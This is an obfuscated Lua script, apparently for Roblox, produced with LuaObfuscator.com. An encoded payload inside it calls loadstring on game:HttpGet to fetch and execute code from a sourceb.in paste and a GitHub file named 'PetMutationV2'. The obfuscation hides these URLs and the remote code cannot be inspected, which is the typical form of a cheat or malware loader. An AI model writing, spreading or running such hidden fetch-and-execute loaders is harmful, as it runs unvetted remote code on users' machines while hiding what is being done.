--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v127=v5(v86,v19);v19=nil;return v127;else return v86;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -(0 + 0))) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v87-(v87%(932 -(857 + 74))) ;else local v88=(809 -241) -(367 + 201) ;local v89;while true do if (v88==((1992 -(68 + 997)) -(214 + 713))) then v89=(1 + 1)^(v32-((1271 -(226 + 1044)) + 0)) ;return (((v31%(v89 + v89))>=v89) and (878 -((1227 -945) + (712 -(32 + 85))))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + ((6 + 1) -4) );v18=v18 + (6 -2) ;return (v40 * (30800116 -(34428522 -20405622))) + (v39 * (65886 -(87 + 263))) + (v38 * (436 -(67 + 113))) + v37 ;end local function v24() local v41=0 + 0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(11 -8)) then if (v46==(952 -((1568 -(745 + 21)) + 150))) then if (v45==(430 -(44 + 386))) then return v47 * 0 ;else v46=2 -1 ;v44=0 -0 ;end elseif (v46==(513 + 977 + 557)) then return ((v45==(997 -((2517 -1602) + 82))) and (v47 * ((2 -(3 -2))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1344 -321) ) * (v44 + (v45/((1189 -(1069 + 118))^(31 + 21)))) ;end if (v41==(7 -(1 + 4))) then v46=v20(v43,47 -26 ,67 -36 );v47=((v20(v43,78 -46 )==(1 + 0 + 0)) and  -((1056 -(87 + 968)) -0)) or (886 -(261 + 624)) ;v41=3 + 0 ;end if (v41==(791 -(368 + 423))) then v42=v23();v43=v23();v41=3 -(8 -6) ;end if (v41==(19 -(10 + 8))) then v44=3 -2 ;v45=(v20(v43,(4 + 0) -(6 -3) ,462 -(416 + 26) ) * ((6 -4)^(102 -70))) + v42 ;v41=1915 -(1789 + 124) ;end end end local function v25(v48) local v49=1413 -(447 + 966) ;local v50;local v51;while true do if ((5 -3)==v49) then v51={};for v117=(1480 + 338) -(1703 + 114) , #v50 do v51[v117]=v2(v1(v3(v50,v117,v117)));end v49=704 -((630 -(163 + 91)) + 325) ;end if (v49==(1 -0)) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=5 -3 ;end if (v49==(1 + (1932 -(1869 + 61)))) then return v6(v51);end if (v49==(0 -(0 + 0))) then v50=nil;if  not v48 then local v123=14 -(9 + 5) ;while true do if (v123==(376 -(85 + (1471 -(1123 + 57))))) then v48=v23();if (v48==(1265 -((855 -612) + 1022))) then return "";end break;end end end v49=3 -2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 654 -(132 + 522) ;end)();local v91=(function() return;end)();local v93=(function() return;end)();while true do if (v90~=(0 -0)) then else local v124=(function() return 1384 -(746 + 638) ;end)();local v125=(function() return;end)();while true do if (v124==0) then v125=(function() return 0;end)();while true do if (0~=v125) then else v91=(function() return v92();end)();v93=(function() return nil;end)();v125=(function() return 1 + 0 ;end)();end if ((1 -0)==v125) then v90=(function() return  #"}";end)();break;end end break;end end end if ( #"]"~=v90) then else if (v91== #"[") then v93=(function() return v92()~=0 ;end)();elseif (v91==(343 -(218 + 123))) then v93=(function() return v94();end)();elseif (v91~= #"nil") then else v93=(function() return v95();end)();end v96[v97]=(function() return v93;end)();break;end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v53=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 1581 -(1535 + 46) ;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do local v116=(function() return 0 + 0 ;end)();while true do if (v116==(0 + 0)) then if (v107==(561 -(306 + 254))) then local v128=(function() return 0;end)();while true do if (v128==0) then local v177=(function() return 0 + 0 ;end)();while true do if (v177==0) then while true do if (v98==0) then v99=(function() return v100();end)();if (v101(v99, #" ", #"{")~=0) then else local v186=(function() return 0 -0 ;end)();local v187=(function() return;end)();local v188=(function() return;end)();local v189=(function() return;end)();while true do if (v186~=2) then else if (v101(v188, #"}", #"]")~= #"!") then else v189[1469 -(899 + 568) ]=(function() return v104[v189[2 + 0 ]];end)();end if (v101(v188,4 -2 ,605 -(268 + 335) )== #" ") then v189[ #"nil"]=(function() return v104[v189[ #"asd"]];end)();end v186=(function() return 293 -(60 + 230) ;end)();end if (v186==(572 -(426 + 146))) then v187=(function() return v101(v99,2, #"-19");end)();v188=(function() return v101(v99, #".com",6);end)();v186=(function() return 1;end)();end if ((1 + 2)==v186) then if (v101(v188, #"xnx", #"nil")== #"!") then v189[ #"xnxx"]=(function() return v104[v189[ #".dev"]];end)();end v105[v106]=(function() return v189;end)();break;end if (v186==(1457 -(282 + 1174))) then local v191=(function() return 0;end)();while true do if (v191==(812 -(569 + 242))) then v186=(function() return 5 -3 ;end)();break;end if (v191==(0 + 0)) then v189=(function() return {v102(),v102(),nil,nil};end)();if (v187==(1251 -(721 + 530))) then local v195=(function() return 0;end)();while true do if (0~=v195) then else v189[ #"nil"]=(function() return v102();end)();v189[ #"http"]=(function() return v102();end)();break;end end elseif (v187== #"]") then v189[ #"-19"]=(function() return v103();end)();elseif (v187==(1273 -(945 + 326))) then v189[ #"gha"]=(function() return v103() -((4 -2)^(15 + 1)) ;end)();elseif (v187== #"xxx") then local v200=(function() return 0;end)();local v201=(function() return;end)();while true do if (v200~=0) then else v201=(function() return 0;end)();while true do if (v201~=0) then else v189[ #"gha"]=(function() return v103() -((702 -(271 + 429))^16) ;end)();v189[ #".com"]=(function() return v102();end)();break;end end break;end end end v191=(function() return 1;end)();end end end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end end end if (v107~=(0 + 0)) then else local v129=(function() return 1500 -(1408 + 92) ;end)();while true do if (1==v129) then v107=(function() return 1087 -(461 + 625) ;end)();break;end if (v129~=0) then else v98=(function() return 1288 -(993 + 295) ;end)();v99=(function() return nil;end)();v129=(function() return 1;end)();end end end break;end end end end;end)();local v54=(function() return function(v108,v109,v110) local v111=(function() return 0;end)();local v112=(function() return;end)();while true do if ((0 + 0)~=v111) then else v112=(function() return 0;end)();while true do if (v112==(1171 -(418 + 753))) then local v130=(function() return 0 + 0 ;end)();local v131=(function() return;end)();while true do if (v130==(0 + 0)) then v131=(function() return 0;end)();while true do if (v131==(0 + 0)) then local v184=(function() return 0 + 0 ;end)();while true do if (v184==0) then v108[v109-#"{" ]=(function() return v110();end)();return v108,v109,v110;end end end end break;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"~",v59 do FlatIdent_A9A3,Type,v21,Cons,v24,v25,v60,v68=(function() return v52(FlatIdent_A9A3,Type,v21,Cons,v24,v25,v60,v68);end)();end v58[ #"-19"]=(function() return v21();end)();for v69= #"{",v23() do FlatIdent_69270,Descriptor,v21,v20,v22,v23,v60,v55,v69=(function() return v53(FlatIdent_69270,Descriptor,v21,v20,v22,v23,v60,v55,v69);end)();end for v70= #".",v23() do v56,v70,v28=(function() return v54(v56,v70,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[530 -(406 + 123) ];local v66=v62[1771 -(1749 + 20) ];local v67=v62[1 + 0 + 2 ];return function(...) local v71=v65;local v72=v66;local v73=v67;local v74=v27;local v75=1;local v76= -((2867 -1544) -(1249 + 73));local v77={};local v78={...};local v79=v12("#",...) -(1146 -(466 + 679)) ;local v80={};local v81={};for v113=(0 -0) -0 ,v79 do if ((v113>=v73) or (3755<=915)) then v77[v113-v73 ]=v78[v113 + (2 -1) ];else v81[v113]=v78[v113 + (1901 -(106 + 1794)) ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1 + 0 ];if ((518<902) and (v84<=(2 + 2))) then if ((3946>3743) and (v84<=(2 -1))) then if (v84==(0 -0)) then v81[v83[116 -(4 + 110) ]]=v83[3]~=(584 -(57 + (1179 -652))) ;else local v133;local v134,v135;local v136;local v137;v81[v83[1429 -(41 + 1386) ]]=v64[v83[(31 + 75) -(17 + 86) ]];v75=v75 + 1 + 0 ;v83=v71[v75];v137=v83[(14 -11) -1 ];v136=v81[v83[8 -5 ]];v81[v137 + (167 -(122 + 44)) ]=v136;v81[v137]=v136[v83[757 -(239 + 514) ]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2 -0 ]]=v83[9 -6 ];v75=v75 + 1 + 0 ;v83=v71[v75];v81[v83[1 + 1 ]]=v83[5 -(1 + 1) ]~=0 ;v75=v75 + (66 -(30 + 35)) ;v83=v71[v75];v137=v83[2 + 0 ];v134,v135=v74(v81[v137](v13(v81,v137 + 1 ,v83[1260 -(1043 + 214) ])));v76=(v135 + v137) -1 ;v133=0;for v164=v137,v76 do local v165=0 -(1329 -(797 + 532)) ;while true do if (v165==(1212 -(323 + 889))) then v133=v133 + 1 + 0 ;v81[v164]=v134[v133];break;end end end v75=v75 + (2 -1) ;v83=v71[v75];v137=v83[582 -(361 + 219) ];v81[v137]=v81[v137](v13(v81,v137 + (321 -(53 + 91 + 176)) ,v76));v75=v75 + 1 ;v83=v71[v75];v81[v83[1 + 1 ]]();v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v64[v83[416 -((34 -19) + 398) ]];v75=v75 + (983 -(18 + (2166 -(373 + 829)))) ;v83=v71[v75];v81[v83[733 -(476 + 255) ]]=v64[v83[11 -8 ]];v75=v75 + 1 + 0 ;v83=v71[v75];v137=v83[2];v136=v81[v83[3]];v81[v137 + 1 ]=v136;v81[v137]=v136[v83[3 + 1 ]];end elseif ((v84<=((1982 -(369 + 761)) -(20 + 830))) or (1335>=3306)) then v81[v83[2 + 0 ]]=v64[v83[3]];elseif ((4844>2253) and (v84==((75 + 54) -(116 + 10)))) then local v166=v83[1 + 1 ];local v167=v81[v83[741 -(542 + 196) ]];v81[v166 + (1 -0) ]=v167;v81[v166]=v167[v83[2 + 2 ]];else v81[v83[2 + 0 ]]();end elseif (v84<=(3 + 4)) then if (v84<=5) then v81[v83[4 -2 ]]=v83[7 -4 ];elseif ((452==452) and (2994>858) and (v84>(1557 -(1126 + 425)))) then local v171=v83[407 -(118 + 287) ];v81[v171]=v81[v171](v13(v81,v171 + (3 -2) ,v76));else do return;end end elseif (v84<=((2050 -921) -(118 + 1003))) then v75=v83[8 -5 ];elseif ((v84==(386 -(142 + 235))) or (4557<2087)) then local v173=v83[9 -(13 -6) ];local v174,v175=v74(v81[v173](v13(v81,v173 + (239 -(64 + 174)) + 0 ,v83[(140 + 840) -(553 + 424) ])));v76=(v175 + v173) -(1 -0) ;local v176=0;for v178=v173,v76 do v176=v176 + 1 + 0 ;v81[v178]=v174[v176];end elseif (v81[v83[2 + 0 ]]==v83[3 + 1 ]) then v75=v75 + 1 + (0 -0) ;else v75=v83[3];end v75=v75 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F5A6A45504E3179577A632F30034E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4372696D736F6E2D4C61672F2Q782F726566732F68656164732F6D61696E2F5065744D75746174696F6E563200153Q0012053Q00013Q00260A3Q0001000100010004083Q00010001001202000100023Q001201000200033Q00202Q00020002000400122Q000400056Q000500016Q000200056Q00013Q00024Q00010001000100122Q000100023Q00122Q000200033Q00202Q000200020004001205000400064Q0009000200044Q000700013Q00022Q00040001000100010004083Q001400010004083Q000100012Q00063Q00017Q00",v9(),...);
